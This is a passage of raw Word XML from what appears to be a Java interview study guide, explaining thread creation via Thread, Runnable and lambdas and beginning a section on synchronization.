    <w:p w14:paraId="7AAFFDEE"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2. By Implementing the Runnable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD9DA1"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Alternatively, you can create a thread by implementing the Runnable interface. This allows you to separate the thread logic from the thread creation and gives you more flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85013B"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D02CE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>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Create a class that implements the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B198E3" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>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Override the run() method to define the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4326A4" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>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Create an instance of the Runnable class and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E23D0" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>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Call the start() method on the Thread object to start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020D248"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FE767"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD2CB1"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783846B5"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD87BD"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System.out.println("Thread is running using Runnable...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D2C6A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD8E50" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0239688F"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CF317"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MyRunnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B69B97"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157BBF5B"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4768D52F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC73EB9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE0018"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25167E19" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>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MyRunnable implements the Runnable interface and provides the implementation for the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF055B4" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>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Thread thread = new Thread(task) creates a new thread and passes the Runnable object (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114C551" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>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The start() method is used to begin the thread's execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E26FB2"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Using Lambda Expressions (Java 8 and Later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE3CD23"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If you're using Java 8 or later, you can simplify the creation of threads with lambda expressions, especially for implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741B0DF"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Example with Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B5047"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public class LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB37189"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35176206"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Runnable task = () -&gt; System.out.println("Thread is running using Lambda expression...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D183E12"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061213BB"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8BA294"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE90A11"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00340339"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C5B66" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>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The lambda expression () -&gt; System.out.println("Thread is running using Lambda expression...") is a shorthand for implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB5303" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>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Thread thread = new Thread(task) creates a thread and passes the lambda expression (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC8516" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>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start() is called to start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A8584"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Summary of How to Start a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556101C7" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>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By Extending Thread:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directly create a thread by subclassing Thread and overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E0DA2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>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lastRenderedPageBreak/>
        <w:t>By Implementing Runnable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement Runnable, create a Thread object with the Runnable instance, and call start().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADA744" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>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Using Lambda (Java 8+):</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simplify Runnable implementation using a lambda expression and pass it to the Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6A402"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In all cases, calling the start() method is essential to initiate the thread, which will internally invoke the run() method of the Thread or Runnable object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C251EA3" w14:textId="0672E2CA" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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DB93D56">
          <v:rect id="_x0000_i1852" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9A37E" w14:textId="77777777" w:rsidR="00F97833" w:rsidRPr="00CE4B95" w:rsidRDefault="00F97833">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc196307763"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads in two different ways?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w14:paraId="1E4EF018" w14:textId="70CDB842" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Java, you can create threads in two primary ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D77FF"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1. By Extending the Thread Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD16313"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In this approach, you create a class that extends the Thread class and override the run() method. The run() method defines the task the thread will perform when it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2D041"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068C2D4D" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>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Create a class that extends the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB294BA" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>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Override the run() method to define the thread's task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40006E6D" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>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Create an instance of the class and call the start() method to start the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9910AE"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21CF2E"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E160E2D"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A8E7F"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA94FD1"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 Task to be executed by the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067C8D1"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System.out.println("Thread is running using Thread class...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F9CC5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DF6CE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0371F868"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465370C4"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 Creating an instance of the MyThread class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19F7E2"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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21474310"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E48BDD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD668F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8590BE"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E87BC" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>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MyThread extends the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A38C6" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>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The run() method defines the task the thread will perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0D8F8" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1201"/>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Calling thread.start() will internally invoke the run() method, starting the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0A884"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2. By Implementing the Runnable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007DA4B4"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In this approach, you create a class that implements the Runnable interface, override the run() method, and pass it to a Thread object. This method allows you to separate the task (represented by the Runnable interface) from the thread logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F242B36"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A9BB2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>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Create a class that implements the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53E265" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>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Override the run() method to define the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20F14A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>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Create an instance of Runnable and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5915B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>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Call the start() method of the Thread object to initiate the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A361213"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760175B"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CB73B"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BE1C9C"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C8621"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 Task to be executed by the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59928AAF"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System.out.println("Thread is running using Runnable interface...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF4E96"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D6C9BA" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4505BA5D"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB5ACE"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 Creating a Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F673C39"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MyRunnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E10B3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53937F"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Creating a thread and passing the Runnable task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E3B43"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36446829"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CB92B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538A360"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0845A"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78422884" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>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MyRunnable implements the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D193628" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>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The run() method defines the task to be executed by the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F6D14" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>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The Runnable object (task) is passed to the Thread constructor, and start() is called to begin the thread execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487C37"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Comparison and When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2562C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>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Extending Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40AA20" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you don't need to extend any other class and want to directly create a thread by overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB8D27" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>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Limitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java does not support multiple inheritance, so if you need to extend another class, you cannot extend Thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2F101" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>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Implementing Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B14730D" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>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Usage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you need to create a thread but also need to extend another class (since Java supports only single inheritance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EA2B3" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>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Advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows you to separate the task from the thread logic, making it more flexible and reusable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0472DD"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In general, </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implementing Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when you need more flexibility, as it allows you to separate the task logic from the threading mechanism, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extending Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is simpler if you don't need to extend any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBB1D5" w14:textId="319EFCAA" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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7A2F508">
          <v:rect id="_x0000_i1853" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78450D78" w14:textId="77777777" w:rsidR="00884A56" w:rsidRPr="00CE4B95" w:rsidRDefault="00884A56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="_Toc196307764"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the necessity of thread synchronization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w14:paraId="52E264A3" w14:textId="66BBA5C4" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Thread synchronization is necessary in Java (and other multithreaded environments) to ensure that multiple threads can safely access shared resources (such as variables, data structures, or files) without causing data corruption or inconsistent results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523BB2E1"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Necessity of Thread Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A50A2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>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Preventing Data Inconsistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When multiple threads access shared data (such as a variable or an object), and at least one of them is modifying the data, synchronization ensures that only one thread can modify the data at a time. Without synchronization, the threads might read and write the shared data simultaneously, leading to inconsistent or corrupted results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59042A18"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFD35B"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class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC0E78"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3E537" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAD3DBB"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public void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026051B"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E8BF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B59B1" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
